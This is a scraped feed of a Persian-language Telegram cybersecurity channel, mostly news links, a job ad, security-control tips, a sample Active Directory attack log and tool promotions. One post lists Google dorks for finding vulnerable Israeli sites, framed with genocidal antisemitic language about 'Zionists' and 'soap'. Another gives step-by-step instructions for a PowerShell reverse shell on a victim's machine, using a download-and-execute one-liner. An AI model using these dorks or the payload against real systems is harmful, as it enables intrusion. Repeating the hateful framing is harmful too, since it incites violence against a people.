Network Security Channel
2.57K subscribers
5.33K photos
3.42K videos
5.56K files
4.44K links
شروع از سال 1395
Security Operation Center (SOC)
Bug Bounty
Vulnerability
Pentest
Hardening
Linux
Reasearch
Security Network
Security Researcher
DevSecOps
Blue Team
Red Team
Download Telegram
درسته کهMISP نسبت بهYETI برتر هست ولی اگر میخواید در YETI دست به آچار بشید مقاله زیر خوبه


** پلتفرم رایگان Threat intelligence

https://readmedium.com/build-your-own-cyber-threat-intel-feeds-at-home-yeti-e13b3edf9f39

@Engineer_Computer
#استخدام #تهران

سلام به دوستان و همکاران محترم یک سازمان دولتی جهت تکمیل نیروی فنی واحد مانیتورینگ شبکه به دو متخصص با دانش فنی در موارد زیر نیاز دارد :

Zabbix
Lpic-1
آشنایی با grafana و splunk و ccna مزیت محسوب میشود

لطفا اطلاعات و رزومه خود را به تلگرام @omidfr ارسال
بفرمایید
یا با شماره 09122036944 تماس بگیرید
@Engineer_Computer
گوگل دورک هایی برای حمله به زیر ساخت های سگیونیستی و تولید صابون:
میتونین خودتون تغیراتی ایجاد کنید👍

site:*.gov.il ext:php
site:*.il "admin"
site:*.il "dashboard"
site:*.il inurl:?id=
site:*.il inurl:?cat=
site:*.il ext:zip
site:*.il inurl:aspx?
site:*.il inurl:?id=

site:*.il inurl:"index.php?id=" OR inurl:"news.php?id=" OR inurl:"gallery.php?id=" OR inurl:"product.php?id=" OR inurl:"post.php?id=" OR inurl:"static"

site:*.il inurl:news.php?id=
site:*.il "index of /"
@Engineer_Computer
👍1
با این کد پاورشل میتونید Reverse shell از سیستم های ویندوزی بگیرید:

https://raw.githubusercontent.com/matitanium/github-dorks/refs/heads/master/profile.ps1

کافیه این ماژول داخل پاورشل قربانی وارد بشه تا دسترسی شما از کامپیوتر طرف برقرار بشه.

مراحل اجرا:‌‌
1. بجای IP,PORT داخل کد, آدرس و پورت سرور خودتون رو قرار بدید.

2. حالا با استفاده از یک پیلود مثل

iex((New-Object Net.WebClient).Downloadstring('https://raw.githubusercontent.com/matitanium/github-dorks/refs/heads/master/profile.ps1'))
میتونید ماژول رو از سرور دریافت و در سیستم قربانی اجرا کنید.

دسترسی برقرار میشود!💣

نکته: این پست ها صرفا جهت استفاده در موارد آموزشی میباشد👍
@Engineer_Computer
نکته ی هفته :

کنترل ها ( کاهنده های ریسک) از دسته های زیر هستند :

۱-جلوگیری کننده : preventive
مثال: فایروال ، طراحی زیرو تراست ، گذاشتن نگهبان دم درب

۲-کشف کننده detective
مثال: IDS ؛ خود SOC ؛ تاحدودی معماری زیرو تراست و هانت


۳-مدیریتی Administrative
مثال: خط مشی ؛ فرآیند و ساختار سازمان

لذا شما فقط نباید به
۱-چند لایه کردن فایروال نگاه کنید .
بلکه باید به این نگاه کنید
۲- آیا توان کشف هم دارید ؟
۳-آیا ساختار سازمانی شما اجازه می‌دهد به موقع لزوم، تمدید لایسنس را انجام دهید ؟

هر سه مورد فوق از کنترل های امنیت و کاهنده های ریسک هستند در زمره جلوگیری کننده ، کشف کننده و مدیریتی

@Engineer_Computer
گستره آلوده شدن توسط نرم افزار جاسوسی پگاسوس بزرگتر شد


هدف قرار گرفته شدن افراد برای جاسوسی
درمورد پگاسوس قبلا در کانال مطلب گذاشته ایم که اختصاصا برای جاسوسی از افراد طراحی شده است.

https://cybersecuritynews-com.cdn.ampproject.org/c/s/cybersecuritynews.com/pegasus-spyware-detected-in-new-mobile-devices/amp/

@Engineer_Computer
Discover how Zero-Trust Network Access (ZTNA) strengthens cybersecurity, reduces costs, and streamlines remote access.
Explore best practices for seamlessly integrating ZTNA into your existing security systems.
Read:
https://thehackernews.com/expert-insights/2024/08/best-practices-for-integrating-ztna.html

Gartner's latest CTEM report highlights Adversarial Exposure Validation (AEV) as vital for cybersecurity, combining breach simulation with pentesting to streamline security assessments, automate testing, and enhance resilience.
Learn more:
https://thehackernews.com/2024/08/ctem-in-spotlight-how-gartners-new.html

@Engineer_Computer
🔒 U.S. agencies have identified an Iranian hacking group, Pioneer Kitten, as the force behind a wave of ransomware attacks.
Key sectors like education, healthcare, and defense are under fire, with sensitive data hanging in the balance.
Read:
https://thehackernews.com/2024/08/us-agencies-warn-of-iranian-hacking.html

Discover how Identity Threat Detection & Response (ITDR) solutions safeguard both human and non-human identities across across multi-environment cloud services, enhancing security against sophisticated identity-based attacks.
Read Guide:
https://thehackernews.com/2024/08/identity-threat-detection-and-response.html

@Engineer_Computer
SOC Analyst Tier1 Interview Form.pdf
212.8 KB
⭕️ SOC Analyst Tier1 Interview Form

نمونه فرم مصاحبه کارشناس مرکز عملیات امنیت SOC T1

@Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
😐 اگر با توجه به تحریم ؛ امکان پرداخت و عضویت در سایت مدیوم برای خواندن مقالات را ندارید از این روش استفاده کنید

لینک مقاله را در readmedium بگذارید


https://readmedium.com/threat-modeling-and-risk-assessment-with-example-3d8bc6177e8d

@Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
🔔 بخشی از لاگ برای حمله به اکتیو اکتیو دایرکتوری
چند نوع حمله


2024-12-05 10:12:34 - User Logon - User: student1 - Source IP: 192.168.1.5 - Workstation: WORKSTATION01
2024-12-05 10:15:12 - Kerberos Service Ticket Request - User: attacker01 - Service: HTTP/[email protected]
2024-12-05 10:15:18 - Security Warning - Suspicious ticket request detected for user attacker01 from IP 192.168.1.101.
2024-12-05 10:20:45 - Service Account Enumeration - Host: DC01 - User: attacker01 - Process: Mimikatz.exe
2024-12-05 10:23:30 - Privilege Escalation - User: attacker01 - Action: SeImpersonatePrivilege enabled.
2024-12-05 10:25:11 - Lateral Movement Detected - Source IP: 192.168.1.101 - Destination: 192.168.1.12 - Protocol: SMB
2024-12-05 10:30:00 - Pass-the-Hash - NTLM Authentication - Source: 192.168.1.12 - Account: admin01 - Hash Used: abcd1234abcd1234abcd1234abcd1234
2024-12-05 10:35:22 - Directory Replication Attempt - User: attacker01 - Command: DCSync - Target: DC01
2024-12-05 10:35:50 - Security Alert - Unauthorized replication detected! Account: attacker01.
2024-12-05 10:40:00 - Malware Executed - Process: lsass.exe - Host: 192.168.1.12 - User: attacker01 - Code Injection Detected
2024-12-05 10:45:13 - DCShadow Attack - New Schema Update Initiated by attacker01.
2024-12-05 10:50:00 - Security Alert - Unauthorized attribute modification - Target: DC01 - Attributes: msDS-AllowedToActOnBehalfOfOtherIdentity

@Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
🔖JShunter

JShunter is a command-line tool designed for analyzing JavaScript files and extracting endpoints. This tool specializes in identifying sensitive data, such as API endpoints and potential security vulnerabilities, making it an essential resource for developers and security researchers.


📱Github: 🔗Link

#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #bugbountyTools
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
THE BEST SOC ANALYST TOOLS.pdf
3.4 MB
🔖 THE BEST SOC ANALYST TOOLS
ابزار های مهم برای SOC

#infosec #cybersecurity #SOC #pentest #SOCTools
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
🎉1
State of Physical Security 2025.pdf
8.9 MB
🔖State of Physical Security 2025
Strategizing, planning, and investing wisely

The integration of artificial intelligence (AI) into physical security systems is promising development and one end users are eager to explore (10% did in 2024 and 37% plan to in 2025)

Analytics and Al techniques will continue to usher in new possibilities, allowing businesses to capitalize on existing physical security data, infrastructure, and sensors to automate mundane tasks and drive higher levels of operational efficiency company-wide.


#infosec #cybersecurity #SOC #pentest #SOCTools
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1